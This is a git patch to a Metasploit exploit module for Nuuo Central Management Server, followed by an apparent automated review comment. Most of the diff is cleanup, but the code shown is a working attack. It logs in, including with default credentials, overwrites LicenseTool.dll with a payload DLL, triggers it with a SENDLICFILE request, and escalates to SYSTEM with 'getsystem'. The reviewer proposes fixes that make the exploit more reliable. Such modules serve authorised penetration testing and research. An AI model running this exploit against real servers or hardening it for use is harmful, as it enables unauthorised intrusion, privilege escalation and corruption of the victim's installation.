From 2b714108075d178f54444e66ece8736a46314162 Mon Sep 17 00:00:00 2001
From: Jacob Robles
Date: Tue, 19 Feb 2019 05:48:54 -0600
Subject: [PATCH] Minor updates exploit:nuuo_cms_fu

---
 modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 48 +++++++++++---------
 1 file changed, 26 insertions(+), 22 deletions(-)

diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
index c9b992198f..cc41127759 100644
--- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
@@ -24,6 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote
 This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided.
+
+ This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
+ fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
+ not execute successfully.
 },
 'License' => MSF_LICENSE,
 'Author' =>
@@ -44,57 +48,57 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Nuuo Central Management Server <= v2.4.0', {} ], ], 'Privileged' => true, - 'DisclosureDate' => "Oct 11 2018", + 'DisclosureDate' => 'Oct 11 2018', 'DefaultTarget' => 0)) end def on_new_session(client) - if client.type == "meterpreter" - print_warning("Please wait a bit while we clean up") + if client.type == 'meterpreter' + print_warning('Please wait a bit while we clean up') client.sys.process.get_processes().each do |proc| - if proc['name'] == "NCS_Server.exe" + if proc['name'] == 'NCS_Server.exe' client.sys.process.kill(proc['pid']) - sleep 5 + Rex.sleep(5) client.shell_command_token("move /y #{@dll} LicenseTool.dll") - client.sys.process.execute("NCS_Server.exe") - print_good("Successfully restored LicenseTool.dll!") + client.sys.process.execute('NCS_Server.exe') + print_good('Successfully restored LicenseTool.dll!') end end # elevate privs to system (we're already Admin anyway), and we're done! - client.run_cmd("getsystem") - print_good("We should have SYSTEM now, enjoy your shell!") + client.run_cmd('getsystem') + print_good('We should have SYSTEM now, enjoy your shell!') else - print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll") + print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll') print_error("To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") - print_error("... otherwise the Nuuo CMS installation will be nuked!") - print_good("Anyway, enjoy your shell!") + print_error('... 
otherwise the Nuuo CMS installation will be nuked!') + print_good('Anyway, enjoy your shell!') end end def exploit nucs_login - if @nucs_session == nil - fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS") + unless @nucs_session + fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') end # Download and upload a backup of LicenseTool.dll, so that we can restore it at post # and not nuke the CMS installation. @dll = rand_text_alpha(12) print_status("Backing up LicenseTool.dll to #{@dll}") - dll_data = nucs_download_file("LicenseTool.dll") + dll_data = nucs_download_file('LicenseTool.dll') nucs_upload_file(@dll, dll_data) - print_status("Uploading payload...") - nucs_upload_file("LicenseTool.dll", generate_payload_dll) + print_status('Uploading payload...') + nucs_upload_file('LicenseTool.dll', generate_payload_dll) - print_status("Sleeping 15 seconds...") - sleep 15 + print_status('Sleeping 15 seconds...') + Rex.sleep(15) - print_status("Sending SENDLICFILE request, shell incoming!") + print_status('Sending SENDLICFILE request, shell incoming!') license_data = rand_text_alpha(50..350) - nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", - "Content-Length: " + license_data.length.to_s], license_data) + nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic", + 'Content-Length: ' + license_data.length.to_s], license_data) end end
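Review bot: In `exploit`, `dll_data = nucs_download_file('LicenseTool.dll')` is uploaded as the backup and the real DLL is then overwritten without checking that the download returned anything, so if that helper yields nil or an empty string on failure (its definition is outside this hunk) the module would have no valid copy to restore — the corruption case the description itself warns about. A guard before `nucs_upload_file(@dll, dll_data)` such as `fail_with(Failure::Unknown, 'Could not back up LicenseTool.dll') if dll_data.nil? || dll_data.empty?` keeps the overwrite from happening without a backup. In `on_new_session`, `print_good('Successfully restored LicenseTool.dll!')` is printed without inspecting the output of `client.shell_command_token("move /y #{@dll} LicenseTool.dll")`, and no restore is attempted at all when no NCS_Server.exe process is listed even though the backup exists; checking the move result and otherwise falling back to the manual-restore instructions already printed in the else branch would make the success message truthful. Since the line was touched anyway, `'Content-Length: ' + license_data.length.to_s` reads more idiomatically as `"Content-Length: #{license_data.length}"`.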